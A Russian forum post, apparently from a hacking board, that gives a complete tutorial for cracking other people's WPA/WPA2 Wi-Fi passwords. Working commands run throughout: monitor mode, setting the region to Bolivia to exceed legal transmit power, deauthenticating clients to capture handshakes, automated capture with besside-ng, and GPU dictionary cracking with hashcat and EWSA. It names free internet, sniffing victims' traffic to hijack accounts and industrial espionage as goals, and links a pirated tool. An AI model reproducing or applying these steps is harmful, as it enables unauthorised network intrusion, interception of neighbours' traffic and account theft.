Взлом Wi-Fi для чайников

или былинный сказ о том как грамотно подрезать пароль соседской вафли и не сильно при этом огрести​

Задолбало читать статьи и смотреть видео. Ничего не получается.

Плачу 100$ человеку, который меня сам лично на практике

пошагово научит взламывать сети WiFi.

Шифрование WPA/WPA2.

snakemc​

Пролог

Wi-Fi сейчас есть практически в каждой квартире. Невидимые нити беспроводных каналов опутали мегаполисы и села, дома и дачи, гаражи и офисы. Несмотря на кажущуюся защищенность (“как, я же задавала пароль?!”) ушлые работники темной стороны IT каким-то образом обходят все эти ваши защиты и нагло влезают в вашу частную беспроводную собственность, чувствуя себя там как дома. При этом для многих простых юзеров эта технология так и остается загадкой, передаваемой из одного поколения хакеров другому. На просторах сети можно найти десятки обрывочных статей и сотни инструкций о том как взломать вай-фай, страждущим предлагается просмотреть обучающее видео с подбором пароля “qwerty123”, но полноценного руководства что называется “от и до” по этой теме я пока не встречал. Что собственно и решил восполнить.

Глава 1. Ищи кому выгодно


Давайте разберемся, зачем же добропорядочные (и не очень) граждане пытаются взломать Wi-Fi соседа? Итак, тому может быть несколько причин:


Халявный интернет. Да-да, тысячи школьников еще в эпоху фидо и модемных соединений лет пятнадцать назад безуспешно искали в поисковиках тот самый волшебный “крякер интернета”, скачивая себе на персоналки целые тонны троянов и прочей нечисти. Бесплатный доступ к Сети был пределом мечтаний целого поколения. Сейчас ситуация значительно изменилась, дешевые безлимитные тарифы доступны практически везде, но иметь в круглосуточном резерве запасной канальчик на случай, если вдруг твой провайдер временно склеит ласты, никому не помешает. Кроме того, нередки ситуации типа “смотри-ка, а у него канал пошире чем у меня будет”, что тоже как бы намекает на полезность происходящего.

Путешественники (и моряки в частности). Когда Wi-Fi в отеле стоит 5 евро в час, а связь с Родиной нужна постоянно и желательно в номере и забесплатно, практическую ценность заломанного Wi-Fi ощущаешь как никогда остро. В излишних комментариях это я думаю не нуждается.

Снифанье трафика жертвы и последующий взлом аккаунтов почты, социальных сетей, асек и прочее хулиганство. Имея на руках пароль от Wi-Fi мы имеем возможность расшифровать весь передаваемый “по воздуху” трафик, включая сессии аутентификации на разных сайтах, куки и много еще чего вкусного.

Промышленый шпионаж. В настоящее время офисный Wi-Fi, по-быстрому настроенный криворуким админом, является для подкованного человека просто парадным входом в ЛВС организации, а там можно найти ох как много интересного, от элементарного снифанья почты и асек до секретных документов в расшаренных папках и файлопомойках.

Пентестинг (от англ. penetration testing - тестирование на проникновение). Пентестеры - это по сути те же хакеры (а зачастую это они и есть), но действующие по заказу и с согласия владельца сети. В их задачи входит проверка безопасности сети и устойчивости к проникновению извне (или нарушению ее работы изнутри). Учитывая стоимость подобного рода услуг вряд ли ваш сосед наймет такого специалиста (если конечно он не олигарх), а вот среди владельцев крупного и среднего бизнеса, озадаченных безопасностью IT-структур своих предприятий, спрос на подобные услуги весьма высок.


Окинув беглым взглядом весь список причин и взвесив все "за" и "против" можно смело приступать... нет, не к практической части и не к водным процедурам, а для начала к теоретической подготовке.

Глава 2. WEP, WPA, HMAC, PBKDF2 и много других страшных слов

На заре развития беспроводного доступа, в далеком 1997 году, британские ученые как-то не слишком заморачивались с вопросами безопасности, наивно полагая что 40-битного WEP-шифрования со статическим ключем будет более чем достаточно, LOL. Но злостные хакеры на пару с талантливыми математиками (среди них отметился также и наш соотечественник Андрей Пышкин, что приятно) быстро разобрались что к чему, и сети защищенные даже длинным WEP-ключом в целых 104 бита в скором времени стали почему-то приравниваться к открытым. Однако с развитием компьютерной грамотности среди простого населения найти WEP-сеть сейчас стало чуть ли не сложнее чем открытую, поэтому основное внимание мы уделим более часто (т.е. повсеместно) встречающемуся WPA/WPA2.

Основное заблуждение рабочего класса - “я использую WPA2, его не взломать”. В жизни все оказывается совсем иначе. Дело в том, что процедура аутентификации (это страшное слово означает проверку что клиент “свой”) клиента беспроводной сети и в WPA, и WPA2 делится на два больших подвида - упрощенная для персонального использования (WPA-PSK, PreShared Key, т.е. авторизация по паролю) и полноценная для беспроводных сетей предприятий (WPA-Enterprise, или WPA-EAP). Второй вариант подразумевает использование специального сервера авторизации (чаще всего это RADIUS) и, к чести разработчиков, не имеет явных проблем с безопасностью. Чего нельзя сказать об упрощенной “персональной” версии. Ведь пароль, задаваемый пользователем, как правило постоянен (вспомните когда в последний раз вы меняли пароль на своем Wi-Fi и передается, пусть и в искаженном виде, в эфире, а значит его может услышать не только тот, кому он предназначен. Конечно разработчики WPA учли горький опыт внедрения WEP и нашпиговали процедуру авторизации разными крутыми динамическими алгоритмами, препятствующими рядовому хакеру быстро прочитать пароль “по воздуху”. В частности, по эфиру от ноутбука (или что там у вас) к точке доступа передается конечно же не сам пароль, а некоторая цифровая каша (хакеры и им сочуствующие называют этот процесс “хендшейк”, от англ. handshake - “рукопожатие”), получаемая в результате пережевывания длинного случайного числа, пароля и названия сети (ESSID) с помощью пары вычислительно сложных итерационных алгоритмов PBKDF2 и HMAC (особенно отличился PBKDF2, заключающийся в последовательном проведении четырех тысяч хеш-преобразований над комбинацией пароль+ESSID). Очевидно, основной целью разработчиков WPA было как можно сильнее усложнить жизнь кулхацкерам и исключить возможность быстрого подбора пароля брутфорсом, ведь для этого придется проводить расчет PBKDF2/HMAC-свертки для каждого варианта пароля, что, учитывая вычислительную сложность этих алгоритмов и количество возможных комбинаций символов в пароле (а их, т.е. символов, в пароле WPA может быть от 8 до 63), продлится ровно до следующего большого взрыва, а то и подольше. Однако принимая во внимание любовь неискушенных пользователей к паролям вида “12345678” в случае с WPA-PSK (а значит и с WPA2-PSK, см.выше) вполне себе возможна так называемая атака по словарю, которая заключается в переборе заранее подготовленных наиболее часто встречающихся нескольких миллиардов паролей, и если вдруг PBKDF2/HMAC свертка с одним из них даст в точности такой же ответ как и в перехваченном хендшейке - бинго! пароль у нас.

Весь вышеперечисленный матан можно было бы и не читать, самое главное будет написано в следующем предложении. Для успешного взлома WPA/WPA2-PSK нужно поймать качественную запись процедуры обмена ключами между клиентом и точкой доступа (“хендшейк”), знать точное название сети (ESSID) и использовать атаку по словарю, если конечно мы не хотим состариться раньше чем досчитаем брутом хотя бы все комбинации паролей начинающихся на “а”. Об этих этапах и пойдет речь в последующих главах.

Глава 3. От теории - к практике

Что же, поднакопив изрядный багаж теоретических знаний перейдем к практическим занятиям. Для этого сначала определим что нам нужно из “железа” и какой софт в это самое “железо” надо загрузить.

Для перехвата хендшейков сгодится даже самый дохлый нетбук. Все что от него требуется - свободный порт USB для подключения “правильного” адаптера Wi-Fi (можно конечно ловить и встроенным, но это только если атаковать соседа по общаге, т.к. хилый сигнал встроенного адаптера и его непонятная антенна вряд ли смогут пробить хотя бы одну нормальную бетонную стенку, не говоря уже о паре сотен метров до жертвы, которые очень желательно выдерживать чтобы не спалиться . Очень хорошим преимуществом нетбука может стать малый вес (если придется работать на выезде) и способность долго работать от батареи. Для решения задачи подбора пароля вычислительной мощности нетбука (да и полноценного ноутбука) уже будет недостаточно, но об этом мы поговорим чуть позже, сейчас необходимо сосредоточиться на хендшейке и методах его поимки.

Чуть выше я упомянул про “правильный” адаптер Wi-Fi. Чем же он так “правилен”? В первую очередь он должен иметь внешнюю антенну с коэффициентом усиления минимум 3 dBi, лучше 5-7 dBi, подключаемую через разъем (это позволит при необходимости подключить вместо штатного штырька внешнюю направленную антенну и тем самым значительно увеличить убойную дистанцию до жертвы), мощность выходного сигнала адаптера должна быть не менее 500 мВт (или 27 dBm что одно и то же). Сильно гнаться за мощностью адаптера тоже не стоит, так как успех перехвата хендшейка зависит не только от того, насколько громко мы кричим в эфир, но и от того насколько хорошо слышим ответ жертвы, а это как правило обычный ноутбук (или еще хуже - смартфон) со всеми недостатками его встроенного Wi-Fi.

Среди вардрайверов всех поколений наиболее “правильными” являются адаптеры тайваньской фирмы ALPHA Network, например AWUS036H или подобный. Помимо альфы вполне работоспособны изделия фирмы TP-LINK, например TL-WN7200ND, хотя стоит он вдвое дешевле по сравнению с альфой, да и тысячи моделей других производителей, похожих друг на друга как две капли воды, благо вайфайных чипсетов в природе существует не так уж и много.

http://s05.radikal.ru/i178/1112/ed/14cd49015712.jpg (http://www.radikal.ru)

http://s017.radikal.ru/i420/1112/97/5c0d00347195.gif (http://www.radikal.ru)

Итак с “железом” разобрались, ноутбук заряжен и готов к подвигам, а в ближайшей компьютерной лавке закуплен нужный адаптер. Теперь пару слов о софте.

Исторически сложилось, что самой распространенной операционной системой на наших ноутбуках была и остается Windows. В этом и состоит главная беда вардрайвера. Дело в том, что к большинству кошерных адаптеров (а точнее их чипсетов) отсутствуют нормальные виндовые драйвера с поддержкой жизненно-необходимых функций - режима мониторинга и инжекции пакетов, что превращает ноутбук разве что в потенциальную жертву, но ни как не в охотника за хендшейками. Справедливости ради стоит отметить, что некоторые чипы таки поддерживаются весьма популярной в узких кругах виндовой прогой CommView, но список их настолько убог по сравнению со стоимостью самой программы (или угрызениями совести скачавшего кракнутую версию), что сразу напрочь отбивает желание заниматься “этим” под Windows. В то же время выход давно придуман, и без ущерба для здоровья вашего ноутбука - это специальный дистрибутив BackTrack Linux, в который майнтейнеры заботливо упаковали не только все необходимые нам драйвера вайфайных чипсетов со всякими хитрыми функциями, но и полный набор утилит пакета aircrack-ng, (который скоро ох как нам пригодится), да и много еще чего полезного.

http://s45.radikal.ru/i109/1112/dc/ad0b4c677ff8.jpg (http://www.radikal.ru)

CommView в действии - посмотрели и забыли как страшный сон

Итак, качаем текущую версию BackTrack 5R1 (далее BT5 или вообще просто BT, т.к. к этому названию нам придется возвращаться еще не раз): http://www.backtrack-linux.org/downloads/

Регистрироваться совсем не обязательно, выбираем оконный менеджер по вкусу (WM Flavor - Gnome или KDE), архитектуру нашего ноутбука (скороее всего 32-битная), Image - ISO (не надо нам никаких виртуалок), и метод загрузки - напрямую (Direct) или через торрент-трекер (Torrent). Дистрибутив является образом Live-DVD, т.е. загрузочного диска, поэтому можно его просто нарезать на болванку и загрузиться, или затратить еще немного времени и калорий и сделать загрузочную флешку с помощью вот этой утилиты: Universal USB Installer (качать здесь: www.pendrivelinux.com). Очевидная прелесть второго решения в том, что на флешке можно создать изменяемый (Persistent) раздел с возможностью сохранения файлов, что в будущем окажется весьма кстати. Не буду подробно останавливаться на самом процессе создания загрузочной флешки, скажу только что желательно чтобы ее объем был не менее 4 Гб.

Вставляем флешку (диск, или что там у вас получилось) в ноут и загружаемся с нее. Вуаля, перед нами страшный и ужасный (а на самом деле жутко красивый) рабочий стол BT5! (Когда попросит имя пользователя и пароль введите root и toor соответствено. Если рабочий стол не появился дайте команду startx. Если опять не появился - значит не судьба вам работать в линукс, курите мануалы).

http://s017.radikal.ru/i416/1112/bb/6d6a63daf212.jpg (http://www.radikal.ru)

BackTrack: Finish him!

Итак, все прекрасно загрузилось, начинаем изучать что у нас где. Для начала давайте нащупаем наш Wi-Fi адаптер, для этого открываем окно командной строки (Terminal или Konsole в зависимости от типа оконного менеджера) и даем команду


root@bt:~# iwconfig

wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=14 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan1 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off


Отлично, наш адаптер виден как wlan1 (wlan0 это встроенный адаптер ноутбука, его можно вообще отключить чтобы не мешался). Переводим wlan1 из режима Managed в режим Monitor:


root@bt:~# airmon-ng start wlan1

и смотрим что получилось:


root@bt:~# iwconfig

wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=14 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off

Просто замечательно, но почему параметр TX-Power (мощность передачи) только 20 dBm? У нас же адаптер на 27 dBm? Попробуем добавить мощности (тут главное не переборщить):


root@bt:~# iwconfig wlan1 txpower 27

Error for wireless request "Set Tx Power" (8B26) :
SET failed on device wlan1 ; Invalid argument.

И тут нас постигает первое разочарование - установить мощность больше 20 dBm нельзя! Это запрещено законодательством многих стран, но только не Боливии! Казалось бы причем здесь Боливия, но:


root@bt:~# iw reg set BO
root@bt:~# iwconfig wlan1 txpower 27


… и все проходит гладко, Боливия нам очень помогла, спасибо ей за это.

Что мы имеем на данном этапе? Наш мощный Wi-Fi адаптер настроен на максимальную мощность в режиме monitor mode и ожидает приказаний на интерфейсе mon0. Самое время осмотреться и прослушать эфир. Это очень просто:


root@bt:~# airodump-ng mon0


Теперь все внимание на экран!

http://s017.radikal.ru/i444/1112/82/c647aba8f3ad.jpg (http://www.radikal.ru)

Красным обведена сеть с WEP - большая редкость по нынешним временам

В левом верхнем углу видно как сканируются каналы (если необходимо зафиксировать канал, нужно вызывать airodump-ng с ключом --channel ), далее идет таблица найденных сетей с указанием (слева направо): BSSID (MAC-адрес сети), уровень приема сигнала в dBm (зависит от чувствительности приемника, на хороших адаптерах -80 dBm это вполне нормальный уровень), количество принятых Beacon frames (это широковещательные пакеты, несущие информацию о сети), число принятых пакетов данных и скорость приема (пакетов в секунду), канал на котором вещает точка доступа, скорость точки доступа в мегабитах, тип аутентификации (OPN - открытая сеть, WEP, WPA, WPA2), тип шифрования, волшебные буковки PSK в случае с WPA/WPA2 (подробности описаны выше в гл.2) и, наконец, название сети, то есть её ESSID.

Чуть ниже основной таблицы приведена таблица текущих ассоциаций клиентов к точкам. Забегая вперед отмечу, что она тоже важна, так как по ней можно определить активность и MAC-адреса клиентов для последующей их деассоциации.

Из картинки выше следует что нам есть чего ловить - есть и точки доступа, и клиенты с хорошим сигналом. Осталось выбрать жертву (чтобы файл сильно не разбухал можно записывать пакеты только от одной точки доступа дав ключ --bssid или ограничив каналы как указано чуть выше) и дать команду записывать пакеты в файл добавив к вызову ключ -w . Важно: если вы загрузились с DVD запись файла с пакетами необходимо вести на внешнюю флешку или жесткий диск, предварительно примонтировав их командой mount:


root@bt:~# mkdir /mnt
root@bt:~# mount /dev/sda1 /mnt
root@bt:~# cd /mnt

где /dev/sda1 - файл устройства внешней флешки (найти куда подцепилась флешка в вашем случае можно покопавшись в результатах вывода команды dmesg).

Для примера запустим airodump-ng на запись пакетов только одной сети из списка в файл testcap.cap:


root@bt:~# airodump-ng --bssid a0:21:b7:a0:71:3c -w testcap mon0

Теперь можно налить чашку кофе и пожевать бутерброд ожидая пока очередной клиент не пожелает прицепиться к точке доступа и подарить нам вожделенный хендшейк. Кстати, после получения хендшейка в правом верхнем углу появится предупреждающая надпись: WPA handshake: A0:21:B7:A0:71:3C. Все, дело сделано, и можно переходить к следующей главе.

Когда все бутерброды подъедены, кофе больше не лезет а хендшейка все нет и нет, в голову приходит светлая мысль что неплохо бы поторопить клиента с хендшейком. Для этого в состав пакета aircrack-ng входит специальная утилита, позволяющая отправлять клиентам запросы на деассоциацию (отсоединение) от точки доступа, после чего клиент снова захочет соединиться, а именно этого мы и ждем. Утилита эта называется aireplay-ng и запускать ее нужно в отдельном окне параллельно с запуском airodump-ng чтобы можно было одновременно записать результаты работы. Запускаем деассоциацию:


root@bt:~# aireplay-ng --deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1

где очевидно, что мы проводим 5 сеансов деассоциации клиента 00:24:2b:6d:3f:d5 от точки доступа с BSSID a0:21:b7:a0:71:3c (адрес клиента мы взяли из нижней таблицы ассоциаций airodump-ng, его можно вообще не указывать, тогда деассоциация будет проводиться широковещательным запросом что не так эффективно как хотелось бы).

После проведения подобной процедуры (а ничто не мешает нам повторить ее еще разок на всякий случай) вероятность словить хендшейк значительно возрастает.

Теперь самое главное. Все, что было описано выше, было описано только в образовательных целях. А все потому что в комплект aircrack-ng входит такая замечательная утилита как besside-ng, которая в автоматическом режиме делает все вышеуказанные операции, сама взламывает WEP и сохраняет хендшейки WPA в отдельный файлик. Запуск этой утилиты прост до безобразия:


root@bt:~# besside-ng mon0

И это все! Дав эту волшебную команду теперь можно просто сидеть и наблюдать за результатами её бурной деятельности, радуясь за все прибывающие и прибывающие хендшейки (они сохраняются в текущую папку в файл wpa.cap, а лог записывается в файл besside.log). Пароли от WEP-сетей, взломанные besside-ng, можно найти так же в её логе.

Что же, результате гигантской проделанной работы у нас накопились *.cap-файлы содержащие хендшейки и можно смело переходить к главе четвертой. Но давайте все же посмотрим что мы наловили и оценим качество хендшейков.

Быстро оценить, есть ли в файле хендшейки, можно с помощью самого простого вызова aircrack-ng:


aircrack-ng

Если хендшейк есть aircrack-ng покажет BSSID, ESSID и количество хендшейков для каждой сети:

http://s53.radikal.ru/i142/1112/d2/bb944fc9cf8f.jpg (http://www.radikal.ru)

aircrack-ng видит хендшейк linksys, бро

Однако выше я упомянул, что с помощью aircrack-ng можно только оценить наличие хендшейка, и это неспроста. Дело в том, что aircrack-ng не отличается хорошим EAPOL-парсером и легко может показать наличие хендшейка там, где его нет (или точнее говоря он есть, но нерабочий). Давайте заберемся поглубже в дебри EAPOL-пакетов с помощью Wireshark (ленивым и не слишком любопытным читателям можно не тратить свое драгоценное время и сразу переходить к главе 4).

Открываем в Wireshark наш *.cap-файл и задаем выражение


(eapol || wlan.fc.type_subtype == 0x08) && not malformed

в качестве фильтра чтобы увидеть среди груды мусора только интересующие нас пакеты.

http://i045.radikal.ru/1112/cd/28b9fc857da2.jpg (http://www.radikal.ru)

Вот они, хендшейки

Итак, что мы видим? Самый певый пакет в списке это Beacon frame, несущий информацию о беспроводной сети. Он есть и указывает на то, что сеть называется ‘dlink’. Бывает что Beacon frame отсутствует в файле, тогда для осуществления атаки мы должны доподлинно знать ESSID сети, причем с учетом того что он регистрозависим (да-да, ‘dlink’, ‘Dlink’ и ‘DLINK’ - это три разных ESSID!) и, например, может содержать пробелы в самых неожиданных местах, например в конце. Задав в таком случае неверный ESSID для атаки мы обречены на провал - пароль не будет найден даже если он есть в словаре! Так что наличие Beacon frame в файле с хендшейком это очевидный плюс.

Далее в файле идут ключевые EAPOL-пакеты, из которых и состоит собственно сам хендшейк. Вообще полноценный EAPOL-хендшейк должен содержать четыре последовательных пакета, от msg (1/4) до msg (4/4), но в данном случае нам не слишком повезло, удалось перехватить только две первых пары, состоящих из msg (1/4) и msg (2/4). Вся прелесть в том, что именно в них передается вся информация о хеше пароля WPA-PSK и именно они нужны для проведения атаки.

Давайте внимательно посмотрим на первую пару msg (1/4) и msg(2/4) (обведена красным прямоугольником). В них точка доступа (Station) 02:22:B0:02:22:B0 передает случайное число ANonce клиенту (Client) 00:18E:00:18E в первом пакете EAPOL-хендшейка и принимает обратно SNonce и MIC, рассчитанные клиентом на основе полученного ANonce. Но обратите внимание на временной промежуток между msg (1/4) и msg (2/4) - он составляет почти целую секунду. Это очень много, и вполне возможно что пакеты msg (1/4) и msg (2/4) относятся к разным хендшейкам (что однозначно приведет к невозможности подобрать пароль даже имея его в словаре), а не имея в перехвате контрольных пакетов msg (3/4) и msg (4/4) проверить это невозможно. Поэтому первый хендшейк имеет весьма сомнительное качество, хотя и выглядит вполне валидным.

К счастью, в данном случае у нас имеется еще одна пара пакетов msg (1/4) и msg (2/4) с временным промежутком между ними всего лишь 50 миллисекунд. Это с большой долей вероятности указывает на их принадлежность к одному и тому же хендшейку, поэтому именно их мы и выберем для атаки. Пометим Beacon frame и эти пакеты нажав правую кнопку мыши и выбрав Mark packet (toggle) и сохраним их в новый файл, выбрав пункт меню ‘Save As...’ и не забыв поставить галочку на Marked packets:

http://s015.radikal.ru/i333/1112/f3/39a0ee9e4883.jpg (http://www.radikal.ru)

Сохраним нажитое непосильным трудом!

В заключение главы хочу отметить, что для атаки все же рекомендуется использовать “полноценные” хендшейки, имеющие Beacon frame и всю последовательность EAPOL-пакетов от первого до четвертого. Для этого ваше Wi-Fi-оборудование должно очень хорошо “слышать” и точку доступа, и клиента. К сожалению, в реальной жизни это не всегда возможно, поэтому приходится идти на компромиссы и пытаться “оживлять” полумертвые хендшейки вручную как и было продемонстрировано выше.

Продолжение следует​

Глава 4. От хендшейка - к паролю

Внимательный читатель уже давно понял, что взлом WPA даже при наличии хендшейка и прямых рук атакующего сродни лотерее, устроителем которой является хозяин точки доступа, назначающий пароль. Теперь, имея на руках более-менее качественный хендшейк наша следующая задача - угадать этот самый пароль, т.е. по сути выиграть в лотерею. Ежу понятно, что благоприятного исхода никто гарантировать не может, но неумолимая статистика показывает, что как минимум 20% WPA-сетей успешно подвергаются взлому, так что отчаиваться не стоит, за дело, друзья!

В первую очередь надо подготовить словарь. WPA-словарь - это обычный текстовый файл, содержащий в каждой строчке один возможный вариант пароля. Учитывая требования к паролям стандарта WPA, возможные пароли должны иметь не менее 8 и не более 63 символов и могут состоять только из цифр, латинских букв верхнего и нижнего регистра и специальных знаков наподобие !@#$% и т.д. (кстати такой алфавит считается достаточно обширным). И если с нижней границей длины пароля все понятно (не менее 8 символов и точка) то с верхней все не так и просто. Взламывать пароль из 63 символов по словарю - совершенно бестолковое занятие, поэтому вполне разумно ограничиться максимальной длиной пароля в словаре 14-16 символов. Качественный словарь (для которого и дана оценка успешности исхода в 20%) весит более 2Гб и содержит порядка 250 млн возможных паролей с длиной в указанном диапазоне 8-16 символов. Что должно входить в эти комбинции возможных паролей? Во-первых, однозначно, весь восьмизначный цифровой диапазон, на который по статистике приходится почти половина всех раскрываемых паролей. Ведь в 8 цифр прекрасно укладываются различные даты, например 05121988. Полный цифровой восьмизнак имеет 10^8 = 100 млн комбинаций что уже само по себе немало. Кроме того, в боевой словарь вардрайвера должны в обязательном порядке входить слова, наиболее часто используемые в качестве паролей, например internet, password, qwertyuiop, имена и др., а так же их мутации с популярными суффиксами-удлинителями паролей (единоличным лидером в этой области является конечно же суффикс 123). Т.е. если пароль diana слишком короток для соответствия стандарту WPA, находчивый юзер в большинстве случаев дополнит его до diana123, заодно увеличивая таким образом (на его опытный взгляд) секретность пароля. Таких популярных суффиксов также известно несколько десятков.

Если самостоятельно собирать словарь влом можно погуглить по ключевым словам wpa wordlist и скачать готовый словарь (не забывайте о таргетировании, ведь довольно наивно будет надеяться на успех гоняя китайский хендшейк по русскому словарю и наоборот) или поискать подходящий вот в этой темке (https://antichat.live/threads/302305/).

http://s017.radikal.ru/i438/1112/73/6b86bcfb88bf.jpg (http://www.radikal.ru)

а вот так можно использовать crunch чтобы создавать различные комбинации из базовых слов

Подготовив какой-никакой словарь (обзовем его для наглядности wordlist.txt) переходим непосредственно к подбору пароля. Запускаем aircrack-ng со следующими параметрами:


root@bt:~# aircrack-ng -e -b -w wordlist.txt testcap.cap


http://s005.radikal.ru/i210/1112/42/fea59a6be334.jpg (http://www.radikal.ru)

Ура! Пароль dictionary нашелся за 3 секунды! (если бы все было так просто...)

На скрине выше aircrack-ng нашел пароль (а это было слово dictionary) всего лишь за 3 секунды. Для этого он перебрал 3740 возможных паролей со скоростью 1039 паролей в секунду. Все бы ничего, но здесь внимательный читатель должен изрядно напрячься, ведь ранее мы говорили о словаре в 250 млн возможных паролей! Быстрый подсчет 250*10^6 делим на 1039 и получаем... порядка 240 тыс секунд, а это 66 часов, а это почти трое суток! Именно столько времени потребуется вашему ноутбуку для обсчета базового 2Гб словаря (если конечно вам не повезет и пароль не найдется где-то посередине процесса). Такие гигантские временные промежутки диктуются низкой скоростью выполнения расчетов, обусловленной высокой вычислительной сложностью заложенных в процедуру аутентификации WPA алгоритмов. Что уже говорить о больших словарях, например полный цифровой девятизнак содержит уже 900 млн комбинаций и потребует пару недель вычислений чтобы убедиться что (как минимум) пароль не найден

Такая лузерская ситуация не могла не беспокоить пытливые умы хакеров и вскоре выход был найден. Для потоковых вычислений были задействованы GPU. GPU (Graphic Processing Unit) - сердце вашего 3D-ускорителя, чип с сотнями (и даже тысячами) потоковых процессоров, позволяющий распределить многочисленные но элементарные операции хеширования паролей и тем самым на порядки ускорить процесс перебора. Чтобы не быть голословным скажу, что разогнаный ATI RADEON HD 5870 способен достичь скорости в 100.000 паролей в секунду, а это про сравнению с aircrack-ng уже ощутимый (на два порядка) скачок вперед.

http://s017.radikal.ru/i400/1112/bc/1cb3442f3c9b.jpg (http://www.radikal.ru)

Монстр ATI RADEON 6990 - 3000 шейдеров, 165.000 WPA паролей в секунду. Кто больше?

Конечно, подобные цифры свойственны только топовым адаптерам ATI RADEON (NVIDIA со своей технологией CUDA пока откровенно сливает ATI в плане скорости перебора WPA ввиду явных архитектурных преимуществ последних). Но за все приходится платить, хороший адаптер стоит хороших денег, да и энергии кушает немало. К тому же надо очень внимательно следить за разгоном и охлаждением GPU, не поддаваясь на провокации тру геймеров, гонящих свои адаптеры вплоть до появления артефактов на экране. Ведь для них артефакты (а по сути аппаратные ошибки вычислителей GPU из-за работы на экстремальных частотах) являются только мимолетным мусором на экране, а для нас череваты пропущенным паролем.

В рамках статьи для новичков я не буду, пожалуй, углубляться в дебри настройки ATI SDK и pyrit под линукс (отмечу только, что это секас еще тот ), т.к. это вполне потянет на отдельную статью (коих есть немало в интернетах), да и целевая аудитория, а именно счастливые обладатели топовых радеонов, не так уж и велика, и вполне могут самостоятельно найти необходимый материал.

Как ни парадоксально, для подбора WPA-пароля с помощью GPU лучше всего подходит Windows. Дело в том, что немалую роль в этом процессе играют драйвера видеоадаптеров, Windows-версиям которых разработчики уделяют куда больше внимания, чем драйверам под Linux и других ОС, и это не случайно, ведь ориентируются они в основном на потребности геймеров. Подбор WPA-пароля под Windows умеют делать две программы - коммерческая Elcomsoft Wireless Security Auditor (или просто EWSA) и консольная утилита hashcat-plus из пакета hashcat by Atom (к всеобщей радости виндовз-юзеров к ней есть и GUI, а попросту говоря отдельный оконный интерфейс). Использование именно этих программ мы и рассмотрим далее, а заодно и сравним их качественные характеристики, а конкретно это будет скорость перебора, которую будет развивать каждая из них в равных условиях, а именно на одном и том же компьютере с одними и теми же драйверами и одним и тем же словарем.

Начать нужно с поиска и установки последней версии драйверов для вашей видеокарты (ну или как минимум убедиться что у вас уже установлена свежая версия). Приверженцы зеленых видеоадаптеров должны посетить www.nvidia.com, красные же идут по старинке на www.ati.com, где выбрав из списка свою модель GPU вы можете скачать драйверы для своей версии Windows. Не буду уделять много внимания процедуре установки драйверов, наверное вы это уже делали ранее, и не один раз.

EWSA можно найти (и купить) на сайте разработчиков - www.elcomsoft.com, только учтите что пробная бесплатная версия по слухам не показывает найденный пароль (нормальную “пробную” версию можно найти здесь (http://rghost.ru/12346671) , только не забудьте удалить ее со своего компьютера после опробования). Установка и настройка EWSA не должны доставить особых хлопот, можно сразу в меню выбрать русский язык, в настройках GPU убедитесь что ваши GPU видны программе и выбраны галочками (если GPU в списке не видны - у вас явно проблема с драйверами), а так же укажите программе ваши словари в настройках словарей.

http://s017.radikal.ru/i429/1112/4c/c08a1409d414.png (http://www.radikal.ru)

Запрягаем всех лошадок...

Жмем “Импорт данных -> Импортировать файл TCPDUMP” и выбираем *.cap-файл с хендшейком (программа их проверит и предложит отметить те, которые мы хотим атаковать), после чего можно смело жать “Запустить атаку -> Атака по словарю”:

http://s005.radikal.ru/i210/1112/2c/eb7ab6fc737c.jpg (http://www.radikal.ru)

EWSA отакуэ (ну что за скорость... )

В данном тесте EWSA показала скорость всего лишь 135.000 паролей в секунду, хотя исходя из конфигурации железа я ожидал увидеть цифру не менее 350 тысяч.

Сравним работу EWSA с ее по-настоящему бесплатным конкурентом - hashcat-plus. Качаем полный набор hashcat-gui (куда уже входит консольная hashcat-plus) с сайта автора (http://hashcat.net/hashcat-gui/) и распаковываем архив в удобное место (установка не требуется). Запускаем hashcat-gui32.exe или hashcat-gui64.exe в зависимости от разрядности Windows и отвечаем на первый же вопрос какой GPU будем использовать - NVidia (CUDA) или ATI RADEON (вариант CPU only нас, очевидно, не устроит).

Когда появится основное окно программы переходим на вкладку oclHashcat-plus (или cudaHashcat-plus в случае с NVidia). Здесь есть одна тонкость - hashcat не умеет парсить EAPOL-хендшейки (вообще никак), и требует от вас выложить ему “на блюдечке” WPA-хеши в его собственном формате *.hccap. Преобразовать обычный *.cap в *.hccap можно с помощью патченой утилиты aircrack-ng, но не загружать же BT опять ради такой мелочи! К нашей всеобщей радости разработчик hashcat сделал удобный онлайн-конвертер (http://hashcat.net/cap2hccap/) , просто загрузите туда ваш *.cap-файл с хендшейком и укажите ESSID, в случае если хендшейк в файле есть вам вернется уже готовый к атаке *.hccap.

Двигаемся далее - указываем программе наш *.hccap-файл в качестве Hash file для атаки, в окошко Word lists добавляем файлы словарей (стрелками можно выставить желаемый порядок их прохождения), выбираем WPA/WPA2 в качестве Hash type и жмем на Start.

http://i081.radikal.ru/1112/9f/532a331f72e4.jpg (http://www.radikal.ru)

Должно появиться консольное окно с запуском выбранной весии hashcat-plus с кучей параметров, и если все в порядке утилита приступит к работе. В процессе расчета можно выводить на экран текущий статус по нажатию клавиши ‘s’, приостанавливать процесс по нажатию ‘p’ или прервать по нажатию ‘q’. Если hashcat-plus вдруг найдет пароль она вас обязательно с ним ознакомит.

http://s52.radikal.ru/i138/1112/31/eaf08bbd0453.png (http://www.radikal.ru)

Результат - 392.000 паролей в секунду! И это очень хорошо согласуется с теоретической предполагаемой скоростью, исходя из конфигурации системы.

Я не являюсь ярым сторонником или противником EWSA или hashcat-plus. Однако данный тест убедительно показывает, что hashcat-plus гораздо лучше масштабируем в случае использования нескольких GPU одновременно. Выбор за вами.

_________________________

Продолжение следует​

Молодец. Огромное тебе спасибо. Так как и правда, нормально разжеванной и цельной статьи о взломе Wi-Fi не встречал.

Давно хотел почитать что то толковое в этом направлении.

Вдумчиво прочитал от А до Я, жду продолжения.

Существует ли софт под windows для перебора с помощью GPU?

